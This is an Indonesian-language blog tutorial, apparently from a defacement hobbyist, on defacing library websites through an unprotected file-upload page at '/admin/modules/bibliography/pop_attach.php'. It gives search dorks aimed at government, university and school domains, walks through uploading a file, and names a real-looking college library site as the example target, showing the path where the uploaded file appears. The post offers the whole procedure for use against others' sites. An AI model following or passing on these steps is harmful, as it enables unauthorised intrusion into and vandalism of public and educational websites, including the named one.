Minggu, 01 April 2018

Deface File Attachment Upload Repository

Author : Anonimokerl


Deface Poc File Attachment Upload Repository.
Hae Tamvan, berjumpa lagi dengan mimin. Kali ini mimin akan memberikan tutor Deface poc File Attachment Upload Repository. Langsung saja.

Bahan :
Dork :
- inurl:/admin/modules/bibliography/pop_attach.php
- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- pustaka.*.(isi dengan domain yang lu mau :v)

Exploit : /admin/modules/bibliography/pop_attach.php

Langkah-langkah :

  • Pertama, kita dorking menggunakan salah satu dork diatas.
  • Kedua, pilih salah satu target.
  • Ketiga, masukan exploit diatas dibelang site/

contoh
http://library.stikessarimulia.ac.id/
Ditambah exploit menjadi :
http://library.stikessarimulia.ac.id/admin/modules/bibliography/pop_attach.php
Keempat, kita isi namanya dan upload file.


Lalu klik unggah sekarang.

  • Kelima, kita panggil filenya, lokasi file : site/repository/yourfile.txt

contoh http://library.stikessarimulia.ac.id/repository/nimo.txt

Selesai :V
Sekian dulu, kalo ada yang kurang mengerti bisa ditanyakan.

1 komentar so far


EmoticonEmoticon